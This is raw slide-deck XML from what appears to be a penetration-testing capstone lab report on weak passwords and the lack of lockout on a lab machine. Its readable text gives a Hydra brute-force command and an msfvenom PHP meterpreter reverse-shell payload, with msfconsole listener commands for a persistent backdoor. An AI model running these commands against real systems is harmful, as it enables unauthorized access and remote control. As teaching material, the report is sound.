            <a:ext cx="36576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4015200" y="17780991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17781507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4015501" y="1235941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600" y="12359926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4015000" y="14166432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14166948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4015601" y="8806718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98900" y="8807233"/>
            <a:ext cx="36576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4015100" y="1061374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10614255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4015101" y="5192159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5192674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4015100" y="6999181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6999696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5204520"/>
            <a:ext cx="1901952" cy="14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719072" y="7052501"/>
            <a:ext cx="1901951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8781959"/>
            <a:ext cx="1901952" cy="14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719072" y="10629941"/>
            <a:ext cx="1901951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2370163"/>
            <a:ext cx="1901952" cy="14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719072" y="14180431"/>
            <a:ext cx="1901951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5990698"/>
            <a:ext cx="1901952" cy="14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719072" y="17795584"/>
            <a:ext cx="1901951" cy="149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4015701" y="1597397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98400" y="15974279"/>
            <a:ext cx="36576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4015200" y="17780991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17781507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4015501" y="1235941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600" y="12359926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4015000" y="14166432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14166948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4015601" y="8806718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98900" y="8807233"/>
            <a:ext cx="36576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4015100" y="1061374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10614255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4015101" y="5192159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5192674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4015100" y="6999181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6999696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5204520"/>
            <a:ext cx="1901952" cy="14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7052501"/>
            <a:ext cx="1901952" cy="14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8781959"/>
            <a:ext cx="1901952" cy="14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0629941"/>
            <a:ext cx="1901952" cy="14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2370163"/>
            <a:ext cx="1901952" cy="14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4180431"/>
            <a:ext cx="1901952" cy="14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5990698"/>
            <a:ext cx="1901952" cy="14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719072" y="17795584"/>
            <a:ext cx="1901952" cy="149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4015701" y="1597397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98400" y="15974279"/>
            <a:ext cx="36576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4015200" y="17780991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17781507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4015501" y="1235941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600" y="12359926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4015000" y="14166432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14166948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4015601" y="8806718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98900" y="8807233"/>
            <a:ext cx="36576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4015100" y="1061374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10614255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4015101" y="5192159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5192674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4015100" y="6999181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6999696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719072" y="5204520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719072" y="7052501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719072" y="8781959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719072" y="10629941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719072" y="12370163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719072" y="14180431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719072" y="15990698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719072" y="17795584"/>
            <a:ext cx="1901952" cy="149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4015701" y="1597397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98400" y="15974279"/>
            <a:ext cx="36576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4015200" y="17780991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17781507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4015501" y="1235941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600" y="12359926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4015000" y="14166432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14166948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4015601" y="8806718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98900" y="8807233"/>
            <a:ext cx="36576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4015100" y="10613740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10614255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4015101" y="5192159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5192674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4015100" y="6999181"/>
            <a:ext cx="31465200" cy="155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6999696"/>
            <a:ext cx="365760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5025875" spcFirstLastPara="1" rIns="184777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719072" y="5204520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719072" y="7052501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719072" y="8781959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719072" y="10629941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719072" y="12370163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719072" y="14180431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719072" y="15990698"/>
            <a:ext cx="1901952" cy="14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719072" y="17795584"/>
            <a:ext cx="1901952" cy="149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52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1097280" y="1133732"/>
            <a:ext cx="34350899" cy="1835864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1097400" y="13639844"/>
            <a:ext cx="34381200" cy="6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369500" wrap="square" tIns="3695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195" y="3174688"/>
            <a:ext cx="29928998" cy="7419902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810100" y="11360124"/>
            <a:ext cx="343812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0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="3695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7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9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9222000" y="13639844"/>
            <a:ext cx="1813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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="18946629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1097400" y="11881594"/>
            <a:ext cx="343812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145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14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3835" y="4714238"/>
            <a:ext cx="4883987" cy="65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34227135" y="19590491"/>
            <a:ext cx="2194800" cy="1623300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="369500" lIns="369500" spcFirstLastPara="1" rIns="369500" wrap="square" tIns="369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600" y="-99502"/>
            <a:ext cx="36886406" cy="207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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="1894662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1097300" y="8613797"/>
            <a:ext cx="343812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369500" wrap="square" tIns="3695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34227135" y="19590491"/>
            <a:ext cx="2194800" cy="1623300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="369500" lIns="369500" spcFirstLastPara="1" rIns="369500" wrap="square" tIns="3695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34227135" y="19590491"/>
            <a:ext cx="2194800" cy="1623300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="369500" lIns="369500" spcFirstLastPara="1" rIns="369500" wrap="square" tIns="3695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6543398" cy="205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100" y="1696796"/>
            <a:ext cx="36576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4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9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9222000" y="6056745"/>
            <a:ext cx="1813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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="1894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34431100" y="20445691"/>
            <a:ext cx="1047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/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr sz="24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398" y="2046291"/>
            <a:ext cx="20169269" cy="1659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600" y="-99502"/>
            <a:ext cx="36886406" cy="207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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="1894662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948400" y="8613797"/>
            <a:ext cx="343812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369500" wrap="square" tIns="3695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700" y="5296817"/>
            <a:ext cx="36576000" cy="147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525" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-590550" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="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indent="-590550" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-590550" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-590550" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-590550" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-590550" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-590550" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-590550" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-590550" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="320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28195800" y="3754377"/>
            <a:ext cx="7315200" cy="1561018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2788021"/>
            <a:ext cx="266988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47775" spcFirstLastPara="1" rIns="1847775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5138232"/>
            <a:ext cx="26798400" cy="16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525" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-590550" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="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1pPr>
            <a:lvl2pPr indent="-590550" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-590550" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-590550" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-590550" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-590550" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-590550" lvl="6" marL="32004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●"/>
              <a:defRPr sz="5700">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-590550" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="5700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr sz="5700">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-590550" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buSzPts val="5700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr sz="5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28225200" y="3755203"/>
            <a:ext cx="7256400" cy="156102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39075" lIns="739075" spcFirstLastPara="1" rIns="7390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49700" y="0"/>
            <a:ext cx="26798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1847775" spcFirstLastPara="1" rIns="1108575" wrap="square" tIns="7390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1097280" y="20236396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1097500" y="2639974"/>
            <a:ext cx="34382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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="1894662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10176200" y="6375049"/>
            <a:ext cx="23080800" cy="10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369500" wrap="square" tIns="3695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5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5032700" y="5497161"/>
            <a:ext cx="5481539" cy="800302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34431100" y="20445691"/>
            <a:ext cx="1047600" cy="435600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="369500" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:buNone/>
              <a:defRPr sz="24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49200" y="20278445"/>
            <a:ext cx="31887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08575" spcFirstLastPara="1" rIns="0" wrap="square" tIns="184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34227135" y="19590491"/>
            <a:ext cx="21948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369500" spcFirstLastPara="1" rIns="369500" wrap="square" tIns="369500">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="5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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId5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1097400" y="7027742"/>
            <a:ext cx="34381200" cy="3267900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t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1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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="125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12500">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="125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1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3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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No password failure lockout and Weak password / Security practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="7500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="Google Shape;1118;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="6106550"/>
            <a:ext cx="14819400" cy="14172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9" name="Google Shape;1119;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1828726" y="3662159"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1120" name="Google Shape;112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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="18280301" y="3662159"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;112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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="19348675" y="6106550"/>
            <a:ext cx="14819400" cy="14172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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19348675" y="6147375"/>
            <a:ext cx="13569600" cy="13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739075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="739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"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>A combination of all of these vulnerabilities allowed for us to conduct successful information gathering,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"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute force access to a restricted folder and crack the hash for a users password.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"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>These steps provided us with access to the webdav, providing a platform to upload a malicious payload.</a:t>
            </a:r>
            <a:endParaRPr i="1"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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2974800" y="6147375"/>
            <a:ext cx="14027100" cy="138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739075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="739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5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During information gathering, we learnt from </a:t>
            </a:r>
            <a:r>
              <a:rPr i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“/meet_our_team/ashton.txt”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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about the existence of “</a:t>
            </a:r>
            <a:r>
              <a:rPr i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/company_folders/secret_folder”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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Accessing this folder required authentication, however informed us of the username via a text prompt </a:t>
            </a:r>
            <a:r>
              <a:rPr i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“For ashtons eyes only”.</a:t>
            </a:r>
            <a:endParaRPr b="1" i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Utilising Hydra’s brute force dictionary attack with the “rockyou.txt” we were able to crack Ashton’s password with the following command</a:t>
            </a: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4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>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“Hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder”</a:t>
            </a:r>
            <a:endParaRPr i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Gaining access to this directory provided instructions on how to connect to the webdav, along with Ryan’s password hash which we were able to crack using the online tool </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en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“crackstation.net”</a:t>
            </a:r>
            <a:endParaRPr i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4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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: No password failure lockout and Weak password / Security practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="7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133" name="Google Shape;1133;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="2858400"/>
            <a:ext cx="30935700" cy="1674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4" name="Google Shape;113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100" y="11443112"/>
            <a:ext cx="21819300" cy="356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8925" y="3606438"/>
            <a:ext cx="14196001" cy="39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1812" y="15248078"/>
            <a:ext cx="13190216" cy="39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7100" y="9006644"/>
            <a:ext cx="21819310" cy="1781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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="31838401" y="2201109"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="23294951" y="6986609"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1142" name="Google Shape;1142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" name="Google Shape;1144;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="23294951" y="9864909"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145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7" name="Google Shape;1147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7100" y="3197688"/>
            <a:ext cx="16090851" cy="440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8" name="Google Shape;1148;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16854451" y="1743259"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1149" name="Google Shape;1149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0" name="Google Shape;1150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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="30878526" y="13191809"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1152" name="Google Shape;1152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3" name="Google Shape;1153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5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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: No password failure lockout and Weak password / Security practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="7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159" name="Google Shape;1159;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="3041550"/>
            <a:ext cx="30935700" cy="1723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112" y="3255200"/>
            <a:ext cx="19277626" cy="340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1" name="Google Shape;1161;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="20791951" y="1760959"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1162" name="Google Shape;1162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3" name="Google Shape;1163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4" name="Google Shape;116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252" y="13262850"/>
            <a:ext cx="6272800" cy="59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8250" y="6656999"/>
            <a:ext cx="18579249" cy="64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1675" y="13329875"/>
            <a:ext cx="7606555" cy="586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7" name="Google Shape;1167;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="21634001" y="5588584"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1168" name="Google Shape;1168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65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10274026" y="12368697"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1171" name="Google Shape;1171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2" name="Google Shape;1172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65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="20791951" y="12520659"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1174" name="Google Shape;1174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09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5" name="Google Shape;1175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6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</a:rPr>
              <a:t>Persistent reverse shell backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="6106550"/>
            <a:ext cx="14819400" cy="14172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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3540775" y="6228675"/>
            <a:ext cx="14010300" cy="14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739075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="739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Following successful connection to the webdav, msfvenom was used to construct a reverse shell payload.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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=6666 -f raw &gt; reverse_shell.php”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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Then using msfconsole we configured a reverse tcp listener in order to gain a meterpreter session on the capstone machine with the following commands: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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“msfconsole”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“use exploit/multi/handler”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“set payload php/meterpreter/reverse_tcp”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“set lport 6666”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“set lhost 192.168.1.90”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“run”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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Now by copying the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3300">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“reverse_shell.php”</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3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400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>file to webdav, and executing it, we establish a successful reverse tcp connection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5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3" name="Google Shape;1183;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1828726" y="3662159"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1184" name="Google Shape;1184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5" name="Google Shape;1185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66"/>
          <p:cNvGrpSpPr/>
